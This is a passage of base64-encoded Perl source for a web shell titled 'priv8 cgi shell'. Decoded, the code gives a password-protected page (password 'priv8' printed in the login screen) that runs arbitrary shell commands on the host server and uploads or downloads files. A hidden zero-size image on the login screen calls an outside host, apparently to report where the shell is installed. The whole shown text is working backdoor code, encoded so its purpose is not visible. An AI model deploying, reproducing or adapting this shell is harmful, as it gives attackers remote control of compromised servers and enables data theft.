  1625. fFxuXG4pKXwoXHJcbiR8XG4kKS8vZzsNCgkJCSR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4
  1626. KCQxKSkvZ2U7DQoJCQkkaW57JGtleX0gPSAkdmFsOyANCgkJfQ0KCX0NCgllbHNlICMgc3RhbmRh
  1627. cmQgcG9zdCBkYXRhICh1cmwgZW5jb2RlZCwgbm90IG11bHRpcGFydCkNCgl7DQoJCUBpbiA9IHNw
  1628. bGl0KC8mLywgJGluKTsNCgkJZm9yZWFjaCAkaSAoMCAuLiAkI2luKQ0KCQl7DQoJCQkkaW5bJGld
  1629. ID1+IHMvXCsvIC9nOw0KCQkJKCRrZXksICR2YWwpID0gc3BsaXQoLz0vLCAkaW5bJGldLCAyKTsN
  1630. CgkJCSRrZXkgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7DQoJCQkkdmFsID1+IHMv
  1631. JSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOw0KCQkJJGlueyRrZXl9IC49ICJcMCIgaWYgKGRl
  1632. ZmluZWQoJGlueyRrZXl9KSk7DQoJCQkkaW57JGtleX0gLj0gJHZhbDsNCgkJfQ0KCX0NCn0NCg0K
  1633. Iy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1634. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgUGFnZSBIZWFkZXINCiMg
  1635. QXJndW1lbnQgMTogRm9ybSBpdGVtIG5hbWUgdG8gd2hpY2ggZm9jdXMgc2hvdWxkIGJlIHNldA0K
  1636. Iy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1637. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50UGFnZUhlYWRlcg0Kew0KCSRFbmNvZGVk
  1638. Q3VycmVudERpciA9ICRDdXJyZW50RGlyOw0KCSRFbmNvZGVkQ3VycmVudERpciA9fiBzLyhbXmEt
  1639. ekEtWjAtOV0pLyclJy51bnBhY2soIkgqIiwkMSkvZWc7DQoJcHJpbnQgIkNvbnRlbnQtdHlwZTog
  1640. dGV4dC9odG1sXG5cbiI7DQoJcHJpbnQgPDxFTkQ7DQo8aHRtbD4NCjxoZWFkPg0KPHRpdGxlPnBy
  1641. aXY4IGNnaSBzaGVsbDwvdGl0bGU+DQokSHRtbE1ldGFIZWFkZXINCg0KPG1ldGEgbmFtZT0ia2V5
  1642. d29yZHMiIGNvbnRlbnQ9InByaXY4IGNnaSBzaGVsbCAgXyAgICAgaTVfQGhvdG1haWwuY29tIj4N
  1643. CjxtZXRhIG5hbWU9ImRlc2NyaXB0aW9uIiBjb250ZW50PSJwcml2OCBjZ2kgc2hlbGwgIF8gICAg
  1644. aTVfQGhvdG1haWwuY29tIj4NCjwvaGVhZD4NCjxib2R5IG9uTG9hZD0iZG9jdW1lbnQuZi5AXy5m
  1645. b2N1cygpIiBiZ2NvbG9yPSIjRkZGRkZGIiB0b3BtYXJnaW49IjAiIGxlZnRtYXJnaW49IjAiIG1h
  1646. cmdpbndpZHRoPSIwIiBtYXJnaW5oZWlnaHQ9IjAiIHRleHQ9IiNGRjAwMDAiPg0KPHRhYmxlIGJv
  1647. cmRlcj0iMSIgd2lkdGg9IjEwMCUiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMiI+DQo8
  1648. dHI+DQo8dGQgYmdjb2xvcj0iI0ZGRkZGRiIgYm9yZGVyY29sb3I9IiNGRkZGRkYiIGFsaWduPSJj
  1649. ZW50ZXIiIHdpZHRoPSIxJSI+DQo8Yj48Zm9udCBzaXplPSIyIj4jPC9mb250PjwvYj48L3RkPg0K
  1650. PHRkIGJnY29sb3I9IiNGRkZGRkYiIHdpZHRoPSI5OCUiPjxmb250IGZhY2U9IlZlcmRhbmEiIHNp
  1651. emU9IjIiPjxiPiANCjxiIHN0eWxlPSJjb2xvcjpibGFjaztiYWNrZ3JvdW5kLWNvbG9yOiNmZmZm
  1652. NjYiPnByaXY4IGNnaSBzaGVsbDwvYj4gQ29ubmVjdGVkIHRvICRTZXJ2ZXJOYW1lPC9iPjwvZm9u
  1653. dD48L3RkPg0KPC90cj4NCjx0cj4NCjx0ZCBjb2xzcGFuPSIyIiBiZ2NvbG9yPSIjRkZGRkZGIj48
  1654. Zm9udCBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj4NCg0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9u
  1655. P2E9dXBsb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+VXBs
  1656. b2FkIEZpbGU8L2ZvbnQ+PC9hPiB8IA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxv
  1657. YWQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPjxmb250IGNvbG9yPSIjRkYwMDAwIj5Eb3dubG9hZCBG
  1658. aWxlPC9mb250PjwvYT4gfA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9bG9nb3V0Ij48Zm9u
  1659. dCBjb2xvcj0iI0ZGMDAwMCI+RGlzY29ubmVjdDwvZm9udD48L2E+IHwNCjwvZm9udD48L3RkPg0K
  1660. PC90cj4NCjwvdGFibGU+DQo8Zm9udCBzaXplPSIzIj4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0t
  1661. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1662. LS0tLS0tLS0tDQojIFByaW50cyB0aGUgTG9naW4gU2NyZWVuDQojLS0tLS0tLS0tLS0tLS0tLS0t
  1663. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1664. LS0tDQpzdWIgUHJpbnRMb2dpblNjcmVlbg0Kew0KCSRNZXNzYWdlID0gcSQ8L2ZvbnQ+PGgxPnBh
  1665. c3M9cHJpdjg8L2gxPjxmb250IGNvbG9yPSIjMDA5OTAwIiBzaXplPSIzIj48cHJlPjxpbWcgYm9y
  1666. ZGVyPSIwIiBzcmM9Imh0dHA6Ly93d3cucHJpdjguaWJsb2dnZXIub3JnL3MucGhwPytjZ2l0ZWxu
  1667. ZXQgc2hlbGwiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiPjwvcHJlPg0KJDsNCiMnDQoJcHJpbnQgPDxF
  1668. TkQ7DQo8Y29kZT4NCg0KVHJ5aW5nICRTZXJ2ZXJOYW1lLi4uPGJyPg0KQ29ubmVjdGVkIHRvICRT
  1669. ZXJ2ZXJOYW1lPGJyPg0KRXNjYXBlIGNoYXJhY3RlciBpcyBeXQ0KPGNvZGU+JE1lc3NhZ2UNCkVO
  1670. RA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1671. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgbWVzc2FnZSB0aGF0
  1672. IGluZm9ybXMgdGhlIHVzZXIgb2YgYSBmYWlsZWQgbG9naW4NCiMtLS0tLS0tLS0tLS0tLS0tLS0t
  1673. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1674. LS0NCnN1YiBQcmludExvZ2luRmFpbGVkTWVzc2FnZQ0Kew0KCXByaW50IDw8RU5EOw0KPGNvZGU+
  1675. DQo8YnI+bG9naW46IGFkbWluPGJyPg0KcGFzc3dvcmQ6PGJyPg0KTG9naW4gaW5jb3JyZWN0PGJy
  1676. Pjxicj4NCjwvY29kZT4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1677. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50
  1678. cyB0aGUgSFRNTCBmb3JtIGZvciBsb2dnaW5nIGluDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1679. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpz
  1680. dWIgUHJpbnRMb2dpbkZvcm0NCnsNCglwcmludCA8PEVORDsNCjxjb2RlPg0KDQo8Zm9ybSBuYW1l
  1681. PSJmIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4NCjxpbnB1dCB0eXBl
  1682. PSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJsb2dpbiI+DQo8L2ZvbnQ+DQo8Zm9udCBzaXplPSIz
  1683. Ij4NCmxvZ2luOiA8YiBzdHlsZT0iY29sb3I6YmxhY2s7YmFja2dyb3VuZC1jb2xvcjojZmZmZjY2
  1684. Ij5wcml2OCBjZ2kgc2hlbGw8L2I+PGJyPg0KcGFzc3dvcmQ6PC9mb250Pjxmb250IGNvbG9yPSIj
  1685. MDA5OTAwIiBzaXplPSIzIj48aW5wdXQgdHlwZT0icGFzc3dvcmQiIG5hbWU9InAiPg0KPGlucHV0
  1686. IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4NCjwvZm9ybT4NCjwvY29kZT4NCkVORA0KfQ0K
  1687. DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1688. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgZm9vdGVyIGZvciB0aGUgSFRN
  1689. TCBQYWdlDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1690. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRQYWdlRm9vdGVyDQp7DQoJ
  1691. cHJpbnQgIjwvZm9udD48L2JvZHk+PC9odG1sPiI7DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0t
  1692. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1693. LS0NCiMgUmV0cmVpdmVzIHRoZSB2YWx1ZXMgb2YgYWxsIGNvb2tpZXMuIFRoZSBjb29raWVzIGNh
  1694. biBiZSBhY2Nlc3NlcyB1c2luZyB0aGUNCiMgdmFyaWFibGUgJENvb2tpZXN7Jyd9DQojLS0tLS0t
  1695. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1696. LS0tLS0tLS0tLS0tLS0tDQpzdWIgR2V0Q29va2llcw0Kew0KCUBodHRwY29va2llcyA9IHNwbGl0
  1697. KC87IC8sJEVOVnsnSFRUUF9DT09LSUUnfSk7DQoJZm9yZWFjaCAkY29va2llKEBodHRwY29va2ll
  1698. cykNCgl7DQoJCSgkaWQsICR2YWwpID0gc3BsaXQoLz0vLCAkY29va2llKTsNCgkJJENvb2tpZXN7
  1699. JGlkfSA9ICR2YWw7DQoJfQ0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1700. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0
  1701. aGUgc2NyZWVuIHdoZW4gdGhlIHVzZXIgbG9ncyBvdXQNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1702. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0N
  1703. CnN1YiBQcmludExvZ291dFNjcmVlbg0Kew0KCXByaW50ICI8Y29kZT5Db25uZWN0aW9uIGNsb3Nl
  1704. ZCBieSBmb3JlaWduIGhvc3QuPGJyPjxicj48L2NvZGU+IjsNCn0NCg0KIy0tLS0tLS0tLS0tLS0t
  1705. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1706. LS0tLS0tLQ0KIyBMb2dzIG91dCB0aGUgdXNlciBhbmQgYWxsb3dzIHRoZSB1c2VyIHRvIGxvZ2lu
  1707. IGFnYWluDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1708. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUGVyZm9ybUxvZ291dA0Kew0KCXBy
  1709. aW50ICJTZXQtQ29va2llOiBTQVZFRFBXRD07XG4iOyAjIHJlbW92ZSBwYXNzd29yZCBjb29raWUN
  1710. CgkmUHJpbnRQYWdlSGVhZGVyKCJwIik7DQoJJlByaW50TG9nb3V0U2NyZWVuOw0KDQoJJlByaW50
  1711. TG9naW5TY3JlZW47DQoJJlByaW50TG9naW5Gb3JtOw0KCSZQcmludFBhZ2VGb290ZXI7DQp9DQoN
  1712. CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1713. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gbG9n
  1714. aW4gdGhlIHVzZXIuIElmIHRoZSBwYXNzd29yZCBtYXRjaGVzLCBpdA0KIyBkaXNwbGF5cyBhIHBh
  1715. Z2UgdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gcnVuIGNvbW1hbmRzLiBJZiB0aGUgcGFzc3dvcmQg
  1716. ZG9lbnMndA0KIyBtYXRjaCBvciBpZiBubyBwYXNzd29yZCBpcyBlbnRlcmVkLCBpdCBkaXNwbGF5
  1717. cyBhIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXINCiMgdG8gbG9naW4NCiMtLS0tLS0tLS0tLS0t
  1718. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1719. LS0tLS0tLS0NCnN1YiBQZXJmb3JtTG9naW4gDQp7DQoJaWYoJExvZ2luUGFzc3dvcmQgZXEgJFBh
  1720. c3N3b3JkKSAjIHBhc3N3b3JkIG1hdGNoZWQNCgl7DQoJCXByaW50ICJTZXQtQ29va2llOiBTQVZF
  1721. RFBXRD0kTG9naW5QYXNzd29yZDtcbiI7DQoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsNCgkJJlBy
  1722. aW50Q29tbWFuZExpbmVJbnB1dEZvcm07DQoJCSZQcmludFBhZ2VGb290ZXI7DQoJfQ0KCWVsc2Ug
  1723. IyBwYXNzd29yZCBkaWRuJ3QgbWF0Y2gNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoInAiKTsNCgkJ
  1724. JlByaW50TG9naW5TY3JlZW47DQoJCWlmKCRMb2dpblBhc3N3b3JkIG5lICIiKSAjIHNvbWUgcGFz
  1725. c3dvcmQgd2FzIGVudGVyZWQNCgkJew0KCQkJJlByaW50TG9naW5GYWlsZWRNZXNzYWdlOw0KDQoJ
  1726. CX0NCgkJJlByaW50TG9naW5Gb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCX0NCn0NCg0KIy0t
  1727. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1728. LS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSB0aGF0IGFsbG93cyB0
  1729. aGUgdXNlciB0byBlbnRlciBjb21tYW5kcw0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1730. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFBy
  1731. aW50Q29tbWFuZExpbmVJbnB1dEZvcm0NCnsNCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50
  1732. RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCglwcmludCA8
  1733. PEVORDsNCjxjb2RlPg0KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3Jp
  1734. cHRMb2NhdGlvbiI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iY29tbWFu
  1735. ZCI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPg0K
  1736. JFByb21wdA0KPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImMiPg0KPGlucHV0IHR5cGU9InN1Ym1p
  1737. dCIgdmFsdWU9IkVudGVyIj4NCjwvZm9ybT4NCjwvY29kZT4NCg0KRU5EDQp9DQoNCiMtLS0tLS0t
  1738. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1739. LS0tLS0tLS0tLS0tLS0NCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVz
  1740. ZXIgdG8gZG93bmxvYWQgZmlsZXMNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1741. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludEZp
  1742. bGVEb3dubG9hZEZvcm0NCnsNCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50RGlyPiAiIDog
  1743. IlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCglwcmludCA8PEVORDsNCjxj
  1744. b2RlPg0KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlv
  1745. biI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPg0K
  1746. PGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImRvd25sb2FkIj4NCiRQcm9tcHQg
  1747. ZG93bmxvYWQ8YnI+PGJyPg0KRmlsZW5hbWU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJmIiBz
  1748. aXplPSIzNSI+PGJyPjxicj4NCkRvd25sb2FkOiA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0i
  1749. QmVnaW4iPg0KPC9mb3JtPg0KPC9jb2RlPg0KRU5EDQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0t
  1750. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1751. LS0NCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gdXBsb2Fk
  1752. IGZpbGVzDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1753. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRGaWxlVXBsb2FkRm9ybQ0K
  1754. ew0KCSRQcm9tcHQgPSAkV2luTlQgPyAiJEN1cnJlbnREaXI+ICIgOiAiW2FkbWluXEAkU2VydmVy
  1755. TmFtZSAkQ3VycmVudERpcl1cJCAiOw0KCXByaW50IDw8RU5EOw0KPGNvZGU+DQoNCjxmb3JtIG5h
  1756. bWU9ImYiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG1ldGhvZD0iUE9TVCIgYWN0aW9u
  1757. PSIkU2NyaXB0TG9jYXRpb24iPg0KJFByb21wdCB1cGxvYWQ8YnI+PGJyPg0KRmlsZW5hbWU6IDxp
  1758. bnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmIiBzaXplPSIzNSI+PGJyPjxicj4NCk9wdGlvbnM6ICZu
  1759. YnNwOzxpbnB1dCB0eXBlPSJjaGVja2JveCIgbmFtZT0ibyIgdmFsdWU9Im92ZXJ3cml0ZSI+DQpP
  1760. dmVyd3JpdGUgaWYgaXQgRXhpc3RzPGJyPjxicj4NClVwbG9hZDombmJzcDsmbmJzcDsmbmJzcDs8
  1761. aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iQmVnaW4iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIg
  1762. bmFtZT0iZCIgdmFsdWU9IiRDdXJyZW50RGlyIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9
  1763. ImEiIHZhbHVlPSJ1cGxvYWQiPg0KPC9mb3JtPg0KPC9jb2RlPg0KRU5EDQp9DQoNCiMtLS0tLS0t
  1764. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1765. LS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdGltZW91
  1766. dCBmb3IgYSBjb21tYW5kIGV4cGlyZXMuIFdlIG5lZWQgdG8NCiMgdGVybWluYXRlIHRoZSBzY3Jp
  1767. cHQgaW1tZWRpYXRlbHkuIFRoaXMgZnVuY3Rpb24gaXMgdmFsaWQgb25seSBvbiBVbml4LiBJdCBp
  1768. cw0KIyBuZXZlciBjYWxsZWQgd2hlbiB0aGUgc2NyaXB0IGlzIHJ1bm5pbmcgb24gTlQuDQojLS0t
  1769. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1770. LS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgQ29tbWFuZFRpbWVvdXQNCnsNCglpZighJFdpbk5UKQ0K
  1771. CXsNCgkJYWxhcm0oMCk7DQoJCXByaW50IDw8RU5EOw0KPC94bXA+DQoNCjxjb2RlPg0KQ29tbWFu
  1772. ZCBleGNlZWRlZCBtYXhpbXVtIHRpbWUgb2YgJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gc2Vjb25k
  1773. KHMpLg0KPGJyPktpbGxlZCBpdCENCkVORA0KCQkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsN
  1774. CgkJJlByaW50UGFnZUZvb3RlcjsNCgkJZXhpdDsNCgl9DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0t
  1775. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1776. LS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gZXhlY3V0ZSBjb21tYW5kcy4gSXQg
  1777. ZGlzcGxheXMgdGhlIG91dHB1dCBvZiB0aGUNCiMgY29tbWFuZCBhbmQgYWxsb3dzIHRoZSB1c2Vy
  1778. IHRvIGVudGVyIGFub3RoZXIgY29tbWFuZC4gVGhlIGNoYW5nZSBkaXJlY3RvcnkNCiMgY29tbWFu
  1779. ZCBpcyBoYW5kbGVkIGRpZmZlcmVudGx5LiBJbiB0aGlzIGNhc2UsIHRoZSBuZXcgZGlyZWN0b3J5
  1780. IGlzIHN0b3JlZCBpbg0KIyBhbiBpbnRlcm5hbCB2YXJpYWJsZSBhbmQgaXMgdXNlZCBlYWNoIHRp
  1781. bWUgYSBjb21tYW5kIGhhcyB0byBiZSBleGVjdXRlZC4gVGhlDQojIG91dHB1dCBvZiB0aGUgY2hh
  1782. bmdlIGRpcmVjdG9yeSBjb21tYW5kIGlzIG5vdCBkaXNwbGF5ZWQgdG8gdGhlIHVzZXJzDQojIHRo
  1783. ZXJlZm9yZSBlcnJvciBtZXNzYWdlcyBjYW5ub3QgYmUgZGlzcGxheWVkLg0KIy0tLS0tLS0tLS0t
  1784. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1785. LS0tLS0tLS0tLQ0Kc3ViIEV4ZWN1dGVDb21tYW5kDQp7DQoJaWYoJFJ1bkNvbW1hbmQgPX4gbS9e
  1786. XHMqY2RccysoLispLykgIyBpdCBpcyBhIGNoYW5nZSBkaXIgY29tbWFuZA0KCXsNCgkJIyB3ZSBj
  1787. aGFuZ2UgdGhlIGRpcmVjdG9yeSBpbnRlcm5hbGx5LiBUaGUgb3V0cHV0IG9mIHRoZQ0KCQkjIGNv
  1788. bW1hbmQgaXMgbm90IGRpc3BsYXllZC4NCgkJDQoJCSRPbGREaXIgPSAkQ3VycmVudERpcjsNCgkJ
  1789. JENvbW1hbmQgPSAiY2QgXCIkQ3VycmVudERpclwiIi4kQ21kU2VwLiJjZCAkMSIuJENtZFNlcC4k
  1790. Q21kUHdkOw0KCQljaG9wKCRDdXJyZW50RGlyID0gYCRDb21tYW5kYCk7DQoJCSZQcmludFBhZ2VI
  1791. ZWFkZXIoImMiKTsNCgkJJFByb21wdCA9ICRXaW5OVCA/ICIkT2xkRGlyPiAiIDogIlthZG1pblxA
  1792. JFNlcnZlck5hbWUgJE9sZERpcl1cJCAiOw0KCQlwcmludCAiJFByb21wdCAkUnVuQ29tbWFuZCI7
  1793. DQoJfQ0KCWVsc2UgIyBzb21lIG90aGVyIGNvbW1hbmQsIGRpc3BsYXkgdGhlIG91dHB1dA0KCXsN
  1794. CgkJJlByaW50UGFnZUhlYWRlcigiYyIpOw0KCQkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50
  1795. RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCgkJcHJpbnQg
  1796. IiRQcm9tcHQgJFJ1bkNvbW1hbmQ8eG1wPiI7DQoJCSRDb21tYW5kID0gImNkIFwiJEN1cnJlbnRE
  1797. aXJcIiIuJENtZFNlcC4kUnVuQ29tbWFuZC4kUmVkaXJlY3RvcjsNCgkJaWYoISRXaW5OVCkNCgkJ
  1798. ew0KCQkJJFNJR3snQUxSTSd9ID0gXCZDb21tYW5kVGltZW91dDsNCgkJCWFsYXJtKCRDb21tYW5k
  1799. VGltZW91dER1cmF0aW9uKTsNCgkJfQ0KCQlpZigkU2hvd0R5bmFtaWNPdXRwdXQpICMgc2hvdyBv
  1800. dXRwdXQgYXMgaXQgaXMgZ2VuZXJhdGVkDQoJCXsNCgkJCSR8PTE7DQoJCQkkQ29tbWFuZCAuPSAi
  1801. IHwiOw0KCQkJb3BlbihDb21tYW5kT3V0cHV0LCAkQ29tbWFuZCk7DQoJCQl3aGlsZSg8Q29tbWFu
  1802. ZE91dHB1dD4pDQoJCQl7DQoJCQkJJF8gPX4gcy8oXG58XHJcbikkLy87DQoJCQkJcHJpbnQgIiRf
  1803. XG4iOw0KCQkJfQ0KCQkJJHw9MDsNCgkJfQ0KCQllbHNlICMgc2hvdyBvdXRwdXQgYWZ0ZXIgY29t
  1804. bWFuZCBjb21wbGV0ZXMNCgkJew0KCQkJcHJpbnQgYCRDb21tYW5kYDsNCgkJfQ0KCQlpZighJFdp
  1805. bk5UKQ0KCQl7DQoJCQlhbGFybSgwKTsNCgkJfQ0KCQlwcmludCAiPC94bXA+IjsNCgl9DQoJJlBy
  1806. aW50Q29tbWFuZExpbmVJbnB1dEZvcm07DQoJJlByaW50UGFnZUZvb3RlcjsNCn0NCg0KIy0tLS0t
  1807. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1808. LS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGRpc3BsYXlzIHRoZSBwYWdlIHRoYXQg
  1809. Y29udGFpbnMgYSBsaW5rIHdoaWNoIGFsbG93cyB0aGUgdXNlcg0KIyB0byBkb3dubG9hZCB0aGUg
  1810. c3BlY2lmaWVkIGZpbGUuIFRoZSBwYWdlIGFsc28gY29udGFpbnMgYSBhdXRvLXJlZnJlc2gNCiMg
  1811. ZmVhdHVyZSB0aGF0IHN0YXJ0cyB0aGUgZG93bmxvYWQgYXV0b21hdGljYWxseS4NCiMgQXJndW1l
  1812. bnQgMTogRnVsbHkgcXVhbGlmaWVkIGZpbGVuYW1lIG9mIHRoZSBmaWxlIHRvIGJlIGRvd25sb2Fk
  1813. ZWQNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
